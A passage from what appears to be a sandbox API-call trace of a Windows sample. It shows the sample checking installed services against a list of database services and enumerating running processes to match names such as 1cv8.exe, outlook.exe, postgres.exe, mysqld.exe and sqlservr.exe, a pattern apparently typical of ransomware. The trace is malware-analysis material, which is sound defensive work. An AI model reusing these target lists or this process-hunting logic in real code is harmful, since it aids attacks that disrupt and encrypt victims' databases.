(lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0057.383] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0057.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0057.383] lstrlenW (lpString="iphlpsvc") returned 8 [0057.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.383] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0057.383] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0057.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0057.383] lstrlenW (lpString="LanmanServer") returned 12 [0057.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0057.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0057.383] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0057.383] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0057.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0057.383] lstrlenW (lpString="LanmanWorkstation") returned 17 [0057.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.383] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0057.383] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0057.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0057.383] lstrlenW (lpString="lmhosts") returned 7 [0057.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0057.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0057.383] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0057.383] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0057.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0057.383] lstrlenW (lpString="MMCSS") returned 5 [0057.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0057.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0057.384] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0057.384] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0057.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0057.384] lstrlenW (lpString="MpsSvc") returned 6 [0057.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0057.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0057.384] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0057.384] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0057.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0057.384] lstrlenW (lpString="Netman") returned 6 [0057.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0057.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0057.384] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0057.384] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0057.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0057.384] lstrlenW (lpString="netprofm") returned 8 [0057.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0057.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0057.384] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0057.384] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0057.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0057.384] lstrlenW (lpString="NlaSvc") returned 6 [0057.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0057.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0057.384] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0057.384] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0057.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0057.384] lstrlenW (lpString="nsi") returned 3 [0057.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0057.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0057.384] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0057.384] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0057.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0057.385] lstrlenW (lpString="PcaSvc") returned 6 [0057.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0057.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0057.385] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0057.385] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0057.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0057.385] lstrlenW (lpString="PlugPlay") returned 8 [0057.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0057.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0057.385] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0057.385] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0057.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0057.385] lstrlenW (lpString="Power") returned 5 [0057.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0057.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0057.385] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0057.385] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0057.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0057.385] lstrlenW (lpString="ProfSvc") returned 7 [0057.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0057.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0057.385] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0057.385] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0057.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0057.385] lstrlenW (lpString="RpcEptMapper") returned 12 [0057.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.385] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0057.385] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0057.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0057.385] lstrlenW (lpString="RpcSs") returned 5 [0057.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0057.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0057.386] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0057.386] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0057.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0057.386] lstrlenW (lpString="SamSs") returned 5 [0057.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0057.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0057.386] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0057.386] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0057.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0057.386] lstrlenW (lpString="Schedule") returned 8 [0057.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0057.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0057.386] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0057.386] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0057.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0057.386] lstrlenW (lpString="SENS") returned 4 [0057.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0057.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0057.386] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0057.386] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0057.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0057.386] lstrlenW (lpString="ShellHWDetection") returned 16 [0057.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.386] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0057.386] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0057.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0057.386] lstrlenW (lpString="Spooler") returned 7 [0057.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0057.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0057.386] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0057.386] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0057.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0057.386] lstrlenW (lpString="swprv") returned 5 [0057.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0057.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0057.387] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0057.387] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0057.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0057.387] lstrlenW (lpString="SysMain") returned 7 [0057.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0057.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0057.387] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0057.387] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0057.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0057.387] lstrlenW (lpString="Themes") returned 6 [0057.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0057.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0057.387] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0057.387] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0057.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0057.387] lstrlenW (lpString="TrkWks") returned 6 [0057.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0057.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0057.387] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0057.387] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0057.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0057.387] lstrlenW (lpString="UxSms") returned 5 [0057.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0057.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0057.387] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0057.387] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0057.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0057.387] lstrlenW (lpString="VSS") returned 3 [0057.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0057.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0057.387] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0057.387] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0057.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0057.388] lstrlenW (lpString="WdiServiceHost") returned 14 [0057.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0057.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0057.388] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0057.388] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0057.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0057.388] lstrlenW (lpString="WdiSystemHost") returned 13 [0057.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0057.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0057.388] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0057.388] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0057.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0057.388] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0057.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0057.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0057.388] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0057.388] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0057.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0057.388] lstrlenW (lpString="Winmgmt") returned 7 [0057.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0057.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0057.388] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0057.388] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0057.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0057.388] lstrlenW (lpString="WPDBusEnum") returned 10 [0057.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0057.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0057.388] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0057.388] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0057.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0057.388] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e39b0 | out: hHeap=0x5f0000) returned 1 [0057.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x178 [0057.391] Process32FirstW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.392] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0057.392] lstrlenW (lpString="System") returned 6 [0057.392] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0057.393] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0057.393] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0057.393] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0057.393] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0057.393] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0057.393] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0057.393] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0057.393] lstrlenW (lpString="smss.exe") returned 8 [0057.393] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0057.393] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0057.393] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0057.393] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0057.393] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0057.394] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0057.394] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0057.394] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.394] lstrlenW (lpString="csrss.exe") returned 9 [0057.394] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0057.394] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0057.394] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0057.394] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0057.394] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0057.394] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0057.394] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0057.394] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0057.395] lstrlenW (lpString="wininit.exe") returned 11 [0057.395] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0057.395] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0057.395] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0057.395] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.396] lstrlenW (lpString="csrss.exe") returned 9 [0057.396] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.397] lstrlenW (lpString="winlogon.exe") returned 12 [0057.397] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.397] lstrlenW (lpString="services.exe") returned 12 [0057.397] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.398] lstrlenW (lpString="lsass.exe") returned 9 [0057.398] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0057.399] lstrlenW (lpString="lsm.exe") returned 7 [0057.399] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.400] lstrlenW (lpString="svchost.exe") returned 11 [0057.400] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.401] lstrlenW (lpString="svchost.exe") returned 11 [0057.401] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.401] lstrlenW (lpString="svchost.exe") returned 11 [0057.401] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.402] lstrlenW (lpString="svchost.exe") returned 11 [0057.402] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.403] lstrlenW (lpString="svchost.exe") returned 11 [0057.403] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0057.403] lstrlenW (lpString="audiodg.exe") returned 11 [0057.403] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.404] lstrlenW (lpString="svchost.exe") returned 11 [0057.404] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.405] lstrlenW (lpString="svchost.exe") returned 11 [0057.405] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0057.405] lstrlenW (lpString="dwm.exe") returned 7 [0057.406] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0057.407] lstrlenW (lpString="explorer.exe") returned 12 [0057.407] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0057.408] lstrlenW (lpString="spoolsv.exe") returned 11 [0057.408] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.408] lstrlenW (lpString="taskhost.exe") returned 12 [0057.408] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.409] lstrlenW (lpString="svchost.exe") returned 11 [0057.409] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0057.410] lstrlenW (lpString="taskeng.exe") returned 11 [0057.410] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.410] lstrlenW (lpString="taskhost.exe") returned 12 [0057.410] Process32NextW 